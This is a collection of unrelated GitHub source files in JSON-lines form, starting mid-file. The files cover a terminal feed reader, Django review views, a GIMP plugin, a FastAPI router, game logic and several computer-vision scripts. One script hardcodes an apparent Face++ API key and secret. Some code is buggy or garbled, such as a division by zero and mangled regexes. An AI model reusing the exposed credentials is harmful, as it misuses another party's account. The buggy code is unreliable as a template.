COLOR[\"number\"]\n if i + 1 == currentNumber:\n fg = COLOR[\"numberselected\"]\n screen.print_at((\"%3s\" % (i + 1)).rjust(3), 1, i + 1, colour=fg, bg=0)\n\n screen.refresh()\n\n def off_number_mode():\n CURRENT[\"shift\"] = 0\n CURRENT[\"input\"] = False\n CURRENT[\"inputnumber\"] = \"\"\n\n draw_entries(clearline=True, force=True)\n screen.refresh()\n\n def open_url(cn):\n\n if \"link\" in cn:\n webbrowser.open(cn[\"link\"], new=2)\n elif \"url\" in cn:\n webbrowser.open(cn[\"url\"], new=2)\n elif \"links\" in cn:\n if len(cn[\"links\"]) == 1:\n webbrowser.open(cn[\"links\"][0], new=2)\n else:\n webbrowser.open(cn[\"permalink\"], new=2)\n elif \"permalink\" in cn:\n webbrowser.open(cn[\"permalink\"], new=2)\n else:\n return False\n\n return True\n\n def show_help():\n w = 60\n s = \"\"\"\n [Up], [Down], [W], [S], [J], [K] : Select from list\n[Shift]+[Up], [Shift]+[Down], [PgUp], [PgDn] : Quickly select from list\n [Space] : Open attached image or URL\n [O] : Open canonical link\n [:] : Select by typing a number from list\n [Tab], [Shift]+[Tab] : Change the category tab\n [Q], [Ctrl]+[C] : Quit\n\"\"\"\n\n s = s.split(\"\\n\")\n lines = len(s)\n width = max([len(d) for d in s]) + 2\n\n screen.clear()\n top = int(screen.height / 2 - lines / 2)\n left = int(screen.width / 2 - width / 2)\n for i, d in enumerate(s):\n screen.print_at(\n \" \" * width,\n left - 1,\n top + i,\n colour=COLOR[\"alertfg\"],\n bg=COLOR[\"alertbg\"],\n )\n screen.print_at(\n d, left, top + i, colour=COLOR[\"alertfg\"], bg=COLOR[\"alertbg\"]\n )\n\n screen.refresh()\n idx = 0\n while True:\n if screen.get_key():\n return\n time.sleep(0.5)\n\n screen.clear()\n\n reload_loop = threading.Thread(target=reload_data, args=[])\n reload_loop.daemon = True\n reload_loop.start()\n\n CURRENT = {\n \"line\": {category[0]: -1 for category in CONFIG[\"categories\"]},\n \"column\": -1,\n \"category\": \"twitter\",\n \"page\": {category[0]: 0 for category in CONFIG[\"categories\"]},\n }\n\n data[CURRENT[\"category\"]] = get_data(CURRENT[\"category\"])\n\n CONFIG[\"rowlimit\"] = screen.height - 2\n if (\n data.get(CURRENT[\"category\"]) is not None\n and len(data[CURRENT[\"category\"]].get(\"entries\", [])) < CONFIG[\"rowlimit\"]\n ):\n CONFIG[\"rowlimit\"] = len(data[CURRENT[\"category\"]][\"entries\"])\n\n if CONFIG[\"rowlimit\"] > 999:\n CONFIG[\"rowlimit\"] = 999\n\n screen.clear()\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n\n current_time = int(time.time() * CONFIG[\"marqueeSpeed\"])\n\n while True:\n\n time.sleep(0.02)\n\n keycode = screen.get_key()\n\n if keycode:\n\n if keycode == KEY[\"esc\"] or keycode in KEY[\"q\"]:\n screen.clear()\n screen.refresh()\n return True\n\n elif CURRENT.get(\"input\"):\n if keycode == KEY[\"enter\"] or keycode == KEY[\":\"]:\n\n if (\n keycode == KEY[\"enter\"]\n and CURRENT[\"inputnumber\"] != \"\"\n and int(CURRENT[\"inputnumber\"]) <= CONFIG[\"rowlimit\"]\n ):\n CURRENT[\"line\"][CURRENT[\"category\"]] = (\n int(CURRENT[\"inputnumber\"]) - 1\n )\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = CURRENT[\"oline\"]\n\n off_number_mode()\n continue\n\n elif keycode in KEYLIST[\"number\"]:\n if len(CURRENT[\"inputnumber\"]) < 3:\n CURRENT[\"inputnumber\"] += str(keycode - KEYLIST[\"number\"][0])\n\n elif keycode == KEY[\"backspace\"]:\n if CURRENT[\"inputnumber\"] != \"\":\n CURRENT[\"inputnumber\"] = CURRENT[\"inputnumber\"][:-1]\n else:\n CURRENT[\"line\"][CURRENT[\"category\"]] = CURRENT[\"oline\"]\n off_number_mode()\n continue\n\n show_current_input_number()\n\n 
continue\n\n elif keycode in KEY[\"r\"]:\n CURRENT[\"line\"][CURRENT[\"category\"]] = -1\n data[CURRENT[\"category\"]] = get_data(CURRENT[\"category\"])\n CONFIG[\"rowlimit\"] = screen.height - 2\n if len(data[CURRENT[\"category\"]][\"entries\"]) < CONFIG[\"rowlimit\"]:\n CONFIG[\"rowlimit\"] = len(data[CURRENT[\"category\"]][\"entries\"])\n draw_entries()\n screen.refresh()\n\n elif keycode == KEY[\"esc\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] = -1\n\n elif keycode == KEY[\"down\"] or keycode in KEY[\"j\"] + KEY[\"s\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] += 1\n if CURRENT[\"line\"][CURRENT[\"category\"]] >= CONFIG[\"rowlimit\"]:\n page_down()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode == KEY[\"up\"] or keycode in KEY[\"k\"] + KEY[\"w\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] -= 1\n if CURRENT[\"line\"][CURRENT[\"category\"]] < 0:\n page_up()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode == KEY[\"shiftUp\"]:\n reset_list_arrow_key()\n CURRENT[\"line\"][CURRENT[\"category\"]] -= 10\n if CURRENT[\"line\"][CURRENT[\"category\"]] < 0:\n page_up()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode == KEY[\"shiftDown\"]:\n CURRENT[\"shift\"] = 0\n CURRENT[\"oline\"] = CURRENT[\"line\"][CURRENT[\"category\"]]\n CURRENT[\"line\"][CURRENT[\"category\"]] += 10\n if CURRENT[\"line\"][CURRENT[\"category\"]] >= CONFIG[\"rowlimit\"]:\n page_down()\n draw_entries(force=True)\n screen.refresh()\n\n elif keycode in KEY[\"o\"]:\n open_url(\n data[CURRENT[\"category\"]][\"entries\"][\n CURRENT[\"line\"][CURRENT[\"category\"]]\n + CURRENT[\"page\"][CURRENT[\"category\"]] * (screen.height - 2)\n ]\n )\n\n elif keycode == KEY[\"space\"]:\n cn = data[CURRENT[\"category\"]][\"entries\"][\n CURRENT[\"line\"][CURRENT[\"category\"]]\n + CURRENT[\"page\"][CURRENT[\"category\"]] * (screen.height - 2)\n ]\n\n if \"medias\" in cn and not CURRENT.get(\"media\", False):\n for url in cn[\"medias\"]:\n urllib.request.urlretrieve(url, \".rterm_tmp.jpg\")\n\n effect = Print(\n screen,\n ColourImageFile(\n screen,\n \".rterm_tmp.jpg\",\n height=screen.height,\n bg=0,\n fill_background=0,\n dither=False,\n uni=True,\n ),\n y=0,\n )\n\n screen.play(\n [Scene([effect])], stop_on_resize=True, repeat=False\n )\n os.remove(\".rterm_tmp.jpg\")\n\n screen.clear()\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n else:\n open_url(cn)\n\n elif keycode == KEY[\":\"]:\n CURRENT[\"input\"] = True\n CURRENT[\"oline\"] = CURRENT[\"line\"][CURRENT[\"category\"]]\n CURRENT[\"line\"][CURRENT[\"category\"]] = -1\n CURRENT[\"inputnumber\"] = \"\"\n\n draw_entries(clearline=True, force=True)\n show_current_input_number()\n screen.refresh()\n\n elif keycode in KEY[\"h\"] or keycode == KEY[\"?\"]:\n show_help()\n draw_categories()\n draw_entries(clearline=True, force=True)\n screen.refresh()\n\n elif keycode in [KEY[\"tab\"], KEY[\"shiftTab\"]]:\n for idx, d in enumerate(CONFIG[\"categories\"]):\n if CURRENT[\"category\"] == d[0]:\n try:\n CURRENT[\"category\"] = CONFIG[\"categories\"][\n idx + (1 if keycode == KEY[\"tab\"] else -1)\n ][0]\n except:\n CURRENT[\"category\"] = CONFIG[\"categories\"][\n 0 if keycode == KEY[\"tab\"] else -1\n ][0]\n break\n\n draw_categories()\n alert(screen, \"LOADING\")\n\n data[CURRENT[\"category\"]] = get_data(CURRENT[\"category\"])\n\n CONFIG[\"rowlimit\"] = screen.height - 2\n if (\n data[CURRENT[\"category\"]] is not None\n and 
len(data[CURRENT[\"category\"]][\"entries\"]) < CONFIG[\"rowlimit\"]\n ):\n CONFIG[\"rowlimit\"] = len(data[CURRENT[\"category\"]][\"entries\"])\n\n draw_categories()\n draw_entries(force=True)\n screen.refresh()\n\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n CURRENT[\"id\"] = data[CURRENT[\"category\"]][\"entries\"][\n CURRENT[\"line\"][CURRENT[\"category\"]]\n ].get(\"id\", \"\")\n\n if keycode in KEYLIST[\"arrow\"]:\n draw_entries(clearline=True)\n screen.refresh()\n\n \"\"\" \n # for keycode debug\n screen.print_at('%s ' % keycode, screen.width - 15, screen.height - 2, colour=0, bg=15)\n screen.refresh()\n #\"\"\"\n\n if CURRENT[\"line\"][CURRENT[\"category\"]] > -1:\n o_current_time = current_time\n current_time = int(\n time.time()\n * CONFIG[\n \"marqueeSpeed\"\n if CURRENT.get(\"direction\", \"left\") == \"left\"\n else \"marqueeSpeedReturn\"\n ]\n )\n\n if o_current_time != current_time:\n do_timer()\n\n if screen.has_resized():\n return False\n\n\ndef do():\n def signal_handler(sig, frame):\n sys.exit(\"Bye\")\n\n if not os.path.isfile(FEEDS_FILE_NAME):\n sys.stdout.write(\"Initalizing RSS feeds...\\n\")\n dummy = get_feeds_from_rss(log=True)\n\n with open(FEEDS_FILE_NAME, \"r\") as fp:\n RSS = json.load(fp)\n\n CONFIG[\"categories\"] = ((\"twitter\", \"Twitter\"),) + tuple(\n [(key, d[\"title\"]) for key, d in RSS.items()]\n )\n\n sys.stdout.write(\"Loading Twitter feeds...\\n\")\n\n dummy = get_data(\"twitter\")\n\n signal.signal(signal.SIGINT, signal_handler)\n\n while True:\n if Screen.wrapper(layout):\n break\n\n sys.stdout.write(\"Bye\\n\")\n\n\nif __name__ == \"__main__\":\n do()\n","repo_name":"rainygirl/rterm","sub_path":"rterm_src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":26131,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"37617646868","text":"#\n# from django.shortcuts import get_object_or_404, redirect\n# from django.urls import reverse, reverse_lazy\n# from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView, TemplateView\n#\n# from webapp.forms import PollForm, ChoiceForm\n# from webapp.models import Poll, Choice, Answer\n#\n#\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.shortcuts import get_object_or_404\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\n\nfrom webapp.forms import ProductForm, ReviewForm\nfrom webapp.models import Product, Review\n\n\nclass ProductsView(ListView):\n model = Product\n template_name = 'for_product/index.html'\n context_object_name = 'products'\n paginate_by = 5\n\n\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(object_list=None, **kwargs)\n products=[]\n object_list=Product.objects.all()\n for product in object_list:\n total = 0\n review = product.review.filter(mod=1)\n for i in review:\n total+=i.score\n avg = total/len(review)\n product.avg = avg\n products.append(product)\n context['products']=products\n return context\n\n#\nclass ProductDetaillView(DetailView):\n model = Product\n template_name = 'for_product/view.html'\n context_object_name = 'product'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(object_list=None, **kwargs)\n total = 0\n pk = self.kwargs.get('pk')\n product = get_object_or_404(Product, pk=pk)\n review = product.review.filter(mod=1)\n for i in review:\n 
total+=i.score\n avg = total/len(review)\n context['avg']=avg\n return context\n\n\n\n\nclass ProductCreate(PermissionRequiredMixin,CreateView):\n template_name = 'for_product/create.html'\n model = Product\n form_class = ProductForm\n permission_required = 'webapp.add_product'\n\n def get_success_url(self):\n return reverse('webapp:ProductDetaillView', kwargs={'pk': self.object.pk})\n#\nclass ProductUpdate(PermissionRequiredMixin,UpdateView):\n template_name = 'for_product/update.html'\n model = Product\n form_class = ProductForm\n permission_required = 'webapp.change_product'\n\n\n\n def get_success_url(self):\n return reverse('webapp:ProductDetaillView', kwargs={'pk': self.object.pk})\n#\nclass ProductDelete(PermissionRequiredMixin,DeleteView):\n model = Product\n context_object_name = 'product'\n template_name = 'for_product/delete.html'\n success_url = reverse_lazy('webapp:ProductsView')\n permission_required = 'webapp.delete_product'\n#\n\n\nclass ReviewView(ListView):\n model = Review\n template_name = 'for_review/view.html'\n context_object_name = 'review'\n\n\n\n\n\nclass ReviewDetaillView(DetailView):\n model = Review\n template_name = 'for_review/detailview.html'\n context_object_name = 'review'\n\n\n\n\n\nclass ReviewCreate(CreateView):\n template_name = 'for_review/create.html'\n form_class = ReviewForm\n\n\n def form_valid(self, form):\n author = self.request.user\n form.instance.author = author\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse('webapp:ReviewDetaillView', kwargs={'pk': self.object.pk})\n#\nclass ReviewUpdate(PermissionRequiredMixin, UpdateView):\n template_name = 'for_review/update.html'\n model = Review\n form_class = ReviewForm\n permission_required = 'webapp.change_review'\n\n def has_permission(self):\n return super().has_permission() and self.request.user == self.get_object().review.author\n\n def form_valid(self, form):\n if self.request.user.is_superuser:\n self.object = form.save()\n else:\n self.object = form.save()\n self.object.mod = False\n self.object.save()\n return super().form_valid(form)\n\n\n\n\n def get_success_url(self):\n return reverse('webapp:ReviewDetaillView', kwargs={'pk': self.object.pk})\n#\nclass DeleteReview(PermissionRequiredMixin, DeleteView):\n model = Review\n context_object_name = 'review'\n template_name = 'for_review/delete.html'\n success_url = reverse_lazy('webapp:ReviewView')\n permission_required = 'webapp.delete_review'\n\n def has_permission(self):\n return super().has_permission() and self.request.user in self.get_object().review.author.all()\n#\n#\n\n#\n#\n#\n#\n#\n#\n#\n","repo_name":"KimLeoVal/7","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28412332307","text":"# -*- coding: utf-8 -*-\nimport os\nfrom mako.lookup import TemplateLookup\n\nsettings = {\n 'debug': True\n}\n\nBASEPATH = os.path.join(os.path.dirname(__file__), \"..\")\n\nSTATIC_HOME = os.path.join(BASEPATH, 'static')\n\nTLOOPUP = TemplateLookup(\n directories=[os.path.join(BASEPATH, 'template')],\n output_encoding='utf-8',\n input_encoding='utf-8',\n default_filters=['decode.utf8'],\n encoding_errors='replace'\n)\n\nif __name__ == '__main__':\n 
print(STATIC_HOME)","repo_name":"1013553207/WAF","sub_path":"src/managerWeb/config/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"74981471800","text":"import cv2 as cv\nimport matplotlib.pyplot as plt\nimport serial as serial\nimport time\n\n#define find laser spot function\ndef find_laser(threshold_a, threshold_b, img, dim):\n #holds all coords suspected to be part of the laser\n spot = []\n \n #loops through image\n for y in range(dim[0]):\n for x in range(dim[1]):\n temp = img[y,x]\n a = temp[1]\n b = temp[2]\n #if pixel is bright enough its coordinates are added to the spot list\n if (a > threshold_a and b > threshold_b):\n coord = [y,x]\n spot.append(coord)\n \n return spot\n\n#calculates average of all coordinates in the spot so that the center can be sent to the arduino\ndef find_center(spot):\n center = [0,0]\n sum_x = 0\n sum_y = 0\n for cordinate in spot:\n sum_x += cordinate[1]\n sum_y += cordinate[0]\n length = len(spot)\n center[0] = sum_y/length\n center[1] = sum_x/length\n \n return center\n \n#establish serial connection\n# ser = serial.Serial('COM3')\n \n#start infinite while loop\nwhile(1):\n # ready = False\n \n # while not ready:\n # with open('filename.txt') as f:\n # for line in f:\n # pass\n # last_line = line\n # if last_line == \"ready to find dot\":\n # ready = True\n \n #if we get this far we know we can load the laser image\n #load in image\n IMG_PATH = r\"C:/Users/jrkin/laser5.jpg\" #need to change this path for actual use\n original = cv.imread(IMG_PATH)\n #hsv = cv.cvtColor(original, cv.COLOR_BGR2HSV)\n dim = original.shape\n \n plt.imshow(original)\n plt.show()\n thresh_a = 250\n thresh_b = 200\n \n spot = []\n #runs find_laser\n iteration = 1\n while (1):\n print(\"running find laser iteration: \", iteration)\n iteration += 1\n spot = find_laser(thresh_a, thresh_b, original, dim)\n #if list of spot coordinates is small enough loop is broke\n if (len(spot) < 100):\n break\n else:\n #if list is too long, threshold values are increased to \n #try and isolate the laser spots\n if (thresh_a < 255):\n thresh_a += 1\n if (thresh_b < 255):\n thresh_b += 5\n \n #finds center of the laser\n center = find_center(spot)\n print(center)\n \n #shows image\n \n plt.imshow(original)\n plt.show()\n break","repo_name":"jrkinneer/jr_design_final","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15693743308","text":"#!/usr/bin/env python\n\nfrom gimpfu import *\n\n\n\ndef vector_to_line_stroke(image, vector, layer, color=\"#000000\", width=1, capstyle=\"butt\", joinstyle=\"miter\", miterlimit=10):\n import re, tempfile\n newelements = {\n 'stroke': color,\n 'stroke-width': width,\n 'stroke-linecap': capstyle,\n 'stroke-linejoin': joinstyle,\n 'stroke-miterlimit': miterlimit,\n }\n svg = pdb.gimp_vectors_export_to_string(image, vector)\n #fix width and height to be resolution (px/inch)-independent\n svg = re.sub(r'(]*\\swidth\\s*=\\s*)\\S*\"', r'\\1\"%dpx\"' % image.width, svg, flags=re.DOTALL)\n svg = re.sub(r'(]*\\sheight\\s*=\\s*)\\S*\"', r'\\1\"%dpx\"' % image.height, svg, flags=re.DOTALL)\n svg = re.sub(r'(]*)\\sstroke\\s*=\\s*\"black\"', r'\\1', svg, flags=re.DOTALL)\n svg = re.sub(r'(]*)\\sstroke-width\\s*=\\s*\"1\"', r'\\1', svg, flags=re.DOTALL)\n svg = re.sub(r'(/MyScripts/Vector To line 
Stroke\", \n \"RGB*\", #no idea whether it will work on other items\n [\n (PF_IMAGE, 'image', 'Image', None),\n (PF_VECTORS, 'vector', 'Vector (path)', None),\n (PF_DRAWABLE, 'layer', 'The target layer for the stroke', None),\n (PF_STRING, 'color', 'Color as string in some way that is SVG comaptible (e.g. \"black\", or \"#FF0000\")', \"#000000\"),\n (PF_INT, 'width', 'Line width', 1),\n (PF_STRING, 'capstyle', 'Some valid SVG cap style (i.e. \"butt\", \"square\", or \"round\")', \"butt\"),\n (PF_STRING, 'joinstyle', 'Some valid SVG join style (i.e. \"miter\", \"round\" or \"bevel\")', \"miter\"),\n (PF_INT, 'miterlimit', '''The miterlimit (google thisif you don't understand it)''', 10)\n ], \n [\n ],\n vector_to_line_stroke,\n )\n\nmain()\n\n#usage: Create an image, with at least one vector (one path), and then run:\n#pdb.python_fu_vector_to_line_stroke(gimp.image_list()[0], gimp.image_list()[0].vectors[0], gimp.image_list()[0].layers[0], \"#000000\", 10, \"butt\", \"miter\", 10)\n","repo_name":"reinhrst/nl.claude.tools","sub_path":"gimp-fu/vector-to-line-stroke.py","file_name":"vector-to-line-stroke.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32785809693","text":"from lattice_planner.lattice_graph import LatticeGraph, ObstaclesGrid\nfrom lattice_planner import drawing_utils\nimport matplotlib.pyplot as plt\n\n\ndef main():\n\n graph = LatticeGraph()\n n_rows = 10\n n_cols = 10\n lattice_cell_size = 10\n lattice_type = 'arc_grid' # square_grid, arc_grid\n\n graph.configure(n_rows=n_rows, n_cols=n_cols, lattice_cell_size=lattice_cell_size, lattice_type=lattice_type)\n\n # square grid , dim=2: (row, col)\n if lattice_type == 'square_grid':\n s = (1, 1)\n g = (9, 9)\n\n # arc grid , dim=3: (row, col, angle) [angle = 0 is horizontal to the right, ccw]\n if lattice_type == 'arc_grid':\n s = (1, 1, 270)\n g = (4, 8, 90)\n\n obs = ObstaclesGrid(map_size=(n_rows*lattice_cell_size, n_cols*lattice_cell_size))\n\n obs.map[25:35, 45:56] = True\n obs.map[67:89, 57:76] = True\n obs.map[50:55, 80:89] = True\n obs.map[20:60, 25:35] = True\n\n graph.update_obstacles(obs)\n\n fig = drawing_utils.plot_scene(obs, graph, lattice_cell_size)\n drawing_utils.plot_graph(fig, graph, obs, lattice_cell_size)\n\n path = graph.solve(s, g, 'A*') # bfs, dijkstra, A*\n\n print(\"path length = \", len(path))\n\n drawing_utils.plot_solution(fig, s, g, path, graph, lattice_cell_size)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"izzys/LatticePlanner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9883625907","text":"from fastapi import APIRouter, Depends, UploadFile, File\nfrom sqlalchemy.orm import Session\nfrom .dependencies import get_db_session, get_current_user\n\n\nfrom schemas.copropietario import Copropietario as Copro\nfrom schemas.copropietario import UpdateCopropietario, CopropietarioBase\nfrom data.models.copropietario import Copropietario\nfrom services.copropietario import CopropietarioService\n\n\ncopropietario_router = APIRouter(prefix='/conpropietario')\n\n@copropietario_router.get(\"/\", response_model=list[UpdateCopropietario], tags=[\"Copropietario\"])\ndef ger_copropietarios(session: Session=Depends(get_db_session)):\n service = CopropietarioService(session)\n\n return 
service.get_copropietarios()\n\n@copropietario_router.post(\"/\", response_model=Copro, tags=[\"Copropietario\"])\ndef register_user(user: Copro = Depends(), foto: UploadFile = File(default=None), \n session: Session=Depends(get_db_session)):\n copropietario_service = CopropietarioService(session)\n if foto:\n foto = foto.file.read()\n\n return copropietario_service.register_copropietario(foto, user)\n\n@copropietario_router.put(\"/{id}\", response_model=Copro, tags=[\"Copropietario\"])\ndef update_copropietario(id_copropietario, foto:UploadFile=File(default=None), user: UpdateCopropietario= Depends(),\n session: Session=Depends(get_db_session)):\n copropietario_service = CopropietarioService(session)\n if foto:\n foto = foto.file.read()\n\n return copropietario_service.update_copropietario(id_copropietario, foto, user)\n\n","repo_name":"mauropascual/SisInfo","sub_path":"AppApi/api/copropietario.py","file_name":"copropietario.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9913433650","text":"\"\"\"Saijil Nemchund\r\nNMCSAI001\r\nProgram that creates the 2048 game\"\"\"\r\n\r\ndef basic(a): \r\n for j in range(4):\r\n if type(a[j])==str: #making the spaces in the grid equal to zero \r\n a[j]=0 \r\n \r\n for i in range(1,4): \r\n m=i\r\n while a[m-1]==0 and m>0: #when a number moves from a position it makes that original position zero \r\n a[m-1]=a[m]\r\n a[m]=0 \r\n m=m-1\r\n \r\n for i in range(3):\r\n if a[i]==a[i+1]:\r\n a[i]=2*a[i]\r\n a[i+1]=0\r\n \r\n for i in range(1,4):\r\n m=i\r\n while a[m-1]==0 and m>0:\r\n a[m-1]=a[m]\r\n a[m]=0\r\n m=m-1 \r\n\r\n\r\n \r\ndef push_right(grid): #when the user slides to the right in the game\r\n for m in range(4):\r\n a=[grid[m][3],grid[m][2],grid[m][1],grid[m][0]]\r\n basic(a)\r\n a.reverse()\r\n for i in range(4):\r\n grid[m][i]=a[i]\r\n\r\ndef push_left(grid): #when the user slides to the left in the game\r\n for m in range(4):\r\n a=[grid[m][0],grid[m][1],grid[m][2],grid[m][3]]\r\n basic(a)\r\n \r\n for i in range(4):\r\n grid[m][i]=a[i] \r\n \r\ndef push_up(grid): # when the user slides up in the game\r\n for m in range(4):\r\n a=[grid[0][m],grid[1][m],grid[2][m],grid[3][m]]\r\n basic(a)\r\n for i in range(4):\r\n grid[i][m]=a[i]\r\n \r\ndef push_down(grid): #when the user slides down in the game\r\n for m in range(4):\r\n a=[grid[3][m],grid[2][m],grid[1][m],grid[0][m]]\r\n basic(a)\r\n a.reverse()\r\n for i in range(4):\r\n grid[i][m]=a[i] ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/nmcsai001/push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74704599481","text":"# import the opencv library\r\nimport cv2\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n# define a video capture object\r\ncamera = cv2.VideoCapture(0)\r\n\r\nmodel = tf.keras.models.load_model(\"Projects/Project-110/rock-paper-scissor_keras_model.h5\")\r\n\r\n\r\nwhile(True):\r\n \r\n # Capture the video frame by frame\r\n status, frame = camera.read()\r\n frame = cv2.flip(frame,1)\r\n img = cv2.resize(frame,(224,224))\r\n testimg = np.array(img,dtype = np.float32)\r\n testimg = np.expand_dims(testimg,axis = 0)\r\n normalizeimg = testimg / 255\r\n \r\n prediction = model.predict(normalizeimg)\r\n print(\"Prediction: \",prediction)\r\n \r\n # Display the resulting frame\r\n cv2.imshow('frame', 
frame)\r\n    \r\n    # Quit window with spacebar\r\n    key = cv2.waitKey(1)\r\n    \r\n    if key == 32:\r\n        break\r\n    \r\n# After the loop release the cap object\r\ncamera.release()\r\n\r\n# Destroy all the windows\r\ncv2.destroyAllWindows()","repo_name":"SuvithSajeev/Project-110","sub_path":"PRO-C110-Project-Boilerplate.py","file_name":"PRO-C110-Project-Boilerplate.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"7135976517","text":"# -*- coding: utf-8 -*-\nimport urllib.request\nimport urllib.error\nimport time\nimport json\nimport cv2\n\ncap = cv2.VideoCapture(0)\ncap.set(3,640) # set Width (3 = CAP_PROP_FRAME_WIDTH)\ncap.set(4,480) # set Height (4 = CAP_PROP_FRAME_HEIGHT)\ntime.sleep(2)\n\n\nfor i in range(10):# stop after capturing 10 images\n    ret, img = cap.read()\n    cv2.imshow('img', img)\n    cv2.imwrite('image/%d.jpg' %(i), img)\n    \n    # Press 'ESC' for exiting video\n    k = cv2.waitKey(100) & 0xff \n    if k == 27:\n        break\n    \ncap.release()\ncv2.destroyAllWindows()\n\nhttp_url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'\nkey = \"VfFq28mDLp1hLWXKGXVfNGO8LUKvpTBs\"\nsecret = \"m1GTqEqGungSNT-J6YIn4MobFsAEOpkL\"\nfilepath = r\"/home/sara/Desktop/test/image/9.jpg\"\n\nboundary = '----------%s' % hex(int(time.time() * 1000))\ndata = []\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_key')\ndata.append(key)\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_secret')\ndata.append(secret)\ndata.append('--%s' % boundary)\nfr = open(filepath, 'rb')\ndata.append('Content-Disposition: form-data; name=\"%s\"; filename=\" \"' % 'image_file')\ndata.append('Content-Type: %s\\r\\n' % 'application/octet-stream')\ndata.append(fr.read())\nfr.close()\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_landmark')\ndata.append('1')\ndata.append('--%s' % boundary)\ndata.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_attributes')\ndata.append(\n    \"gender,age,smiling,headpose,facequality,blur,eyestatus,emotion,ethnicity,beauty,mouthstatus,eyegaze,skinstatus\")\ndata.append('--%s--\\r\\n' % boundary)\n\nfor i, d in enumerate(data):\n    if isinstance(d, str):\n        data[i] = d.encode('utf-8')\n\nhttp_body = b'\\r\\n'.join(data)\n\n# build http request\nreq = urllib.request.Request(url=http_url, data=http_body)\n\n# header\nreq.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)\n\ntry:\n    # post data to server\n    resp = urllib.request.urlopen(req, timeout=5)\n    # get response\n    qrcont = resp.read()\n    # if you want to load as json, you should decode first,\n    rsp = json.loads(qrcont.decode('utf-8'))\n    # print(qrcont.decode('utf-8'))\n    # print(rsp)\n    # print(type(rsp))\n    print(rsp['faces'][0]['attributes']['glass']['value'])\n    if rsp['faces'][0]['attributes']['glass']['value']=='Normal':\n        print(\"please take off your glasses\")\n    elif rsp['faces'][0]['attributes']['glass']['value']=='Dark':\n        print(\"please take off your dark glasses\")\nexcept urllib.error.HTTPError as e:\n    print(e.read().decode('utf-8'))\n","repo_name":"sara0818/summerTerm","sub_path":"cv/sourcecode/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"31965168702","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 24 02:29:11 2020\n\n@author: pranay\n\"\"\"\n\nimport 
numpy as np\nimport pandas as pd\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Patch\n\nfrom matplotlib import cm\nfrom matplotlib import colors as mcolors\n\n# LOLH objects\n\nimport sys\nsys.path.append('../../python')\n\nfrom instance import Instance\nfrom solver import Solver\n\nimport visualizer\nimport histogram\n\n#-------------------------------------------------------------------------------\ndef compute_polygons(instance, nondominated_atoms):\n\n # pre: ordered non dominated atoms (indexes)\n\n points_inside = []\n points_outside = []\n\n index = 0\n for atom_index in nondominated_atoms:\n score = instance.atom_score[atom_index]\n\n if index == 0:\n bottom = 0\n else:\n bottom = instance.atom_score[nondominated_atoms[index-1]][1]\n\n if index == len(nondominated_atoms)-1:\n right = instance.n_positives()\n else:\n right = instance.atom_score[nondominated_atoms[index+1]][0]\n\n points_inside.append((score[0], bottom))\n points_inside.append(score)\n points_inside.append((right, score[1]))\n\n points_outside.append((score[0], bottom))\n points_outside.append(score)\n points_outside.append((right, score[1]))\n\n index += 1\n\n points_inside.append((instance.n_positives(), 0))\n 